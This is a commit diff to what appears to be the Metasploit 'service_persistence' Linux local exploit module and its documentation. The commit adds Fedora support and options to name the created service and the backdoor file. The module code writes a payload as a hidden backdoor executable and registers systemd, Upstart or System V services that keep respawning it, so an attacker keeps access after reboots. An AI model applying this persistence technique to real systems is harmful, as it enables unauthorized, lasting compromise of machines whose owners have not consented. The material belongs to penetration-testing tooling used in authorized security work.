fedora compatibility, added naming options

Author: h00die

documentation/modules/exploit/linux/local/service_persistence.md

@@ -6,6 +6,8 @@
 2. Ubuntu 14.04 (Upstart)
 3. Ubuntu 16.04 (systemd)
 4. Centos 5 (System V)
+5. Fedora 18 (systemd)
+6. Fedora 20 (systemd)
 
 ## Verification Steps
 
@@ -40,6 +42,14 @@
 
   If you need to change the location where the backdoor is written (like on CentOS 5), it can be done here.  Default is /usr/local/bin
 
+**SERVICE**
+
+  The name of the service to create.  If not chosen, a 7 character random one is created.
+
+**SHELL_NAME**
+
+  The name of the file to write with our shell.  If not chosen, a 5 character random one is created.
+
 ## Scenarios
 
 ### System V (Centos 5 - root - chkconfig)

modules/exploits/linux/local/service_persistence.rb

@@ -29,10 +29,12 @@ def initialize(info = {})
               Ubuntu <= 9.04
             Upstart:
               CentOS 6
+              Fedora >= 9, < 15
               Ubuntu >= 9.10, <= 14.10
             systemd:
               CentOS 7
-              Debian >=7, <=8
+              Debian >= 7, <=8
+              Fedora >= 15
               Ubuntu >= 15.04
           Note: System V won't restart the service if it dies, only an init change (reboot etc) will restart it.
         ),
@@ -73,7 +75,9 @@ def initialize(info = {})
 
     register_options(
       [
-        OptPath.new('SHELLPATH', [true, 'Writable path to put our shell', '/usr/local/bin'])
+        OptPath.new('SHELLPATH', [true, 'Writable path to put our shell', '/usr/local/bin']),
+        OptString.new('SHELL_NAME', [false, 'Name of shell file to write']),
+        OptString.new('SERVICE', [false, 'Name of service to create'])
       ], self.class
     )
   end
@@ -115,7 +119,8 @@ def service_system_exists?(command)
   end
 
   def write_shell(path)
-    backdoor = "#{path}/#{Rex::Text.rand_text_alpha(5)}"
+    file_name = datastore['SHELL_NAME'] ? datastore['SHELL_NAME'] : Rex::Text.rand_text_alpha(5)
+    backdoor = "#{path}/#{file_name}"
     vprint_status("Writing backdoor to #{backdoor}")
     write_file(backdoor, payload.encoded)
     cmd_exec("chmod 711 #{backdoor}")
@@ -126,8 +131,8 @@ def systemd(backdoor_path, backdoor_file)
     # https://coreos.com/docs/launching-containers/launching/getting-started-with-systemd/
     script = "[Unit]\n"
     script << "Description=Start daemon at boot time\n"
-    script << "After=networking.service\n"
-    script << "Requires=networking.service\n"
+    script << "After=\n"
+    script << "Requires=\n"
     script << "[Service]\n"
     script << "RestartSec=10s\n"
     script << "Restart=always\n"
@@ -136,7 +141,7 @@ def systemd(backdoor_path, backdoor_file)
     script << "[Install]\n"
     script << "WantedBy=multi-user.target\n"
 
-    service_filename = Rex::Text.rand_text_alpha(7)
+    service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
     vprint_status("Writing service: /lib/systemd/system/#{service_filename}.service")
     write_file("/lib/systemd/system/#{service_filename}.service", script)
     vprint_status('Enabling service')
@@ -159,7 +164,7 @@ def upstart(backdoor_path, backdoor_file, runlevel)
     script << "respawn\n"
     script << "respawn limit unlimited\n"
 
-    service_filename = Rex::Text.rand_text_alpha(7)
+    service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
     vprint_status("Writing service: /etc/init/#{service_filename}.conf")
     write_file("/etc/init/#{service_filename}.conf", script)
     vprint_status('Starting service')
@@ -263,7 +268,7 @@ def system_v(backdoor_path, backdoor_file, runlevel, has_updatercd)
     script << "esac\n"
     script << "exit 0\n"
 
-    service_filename = Rex::Text.rand_text_alpha(7)
+    service_filename = datastore['SERVICE'] ? datastore['SERVICE'] : Rex::Text.rand_text_alpha(7)
     vprint_status("Writing service: /etc/init.d/#{service_filename}")
     write_file("/etc/init.d/#{service_filename}", script)
     cmd_exec("chmod 755 /etc/init.d/#{service_filename}")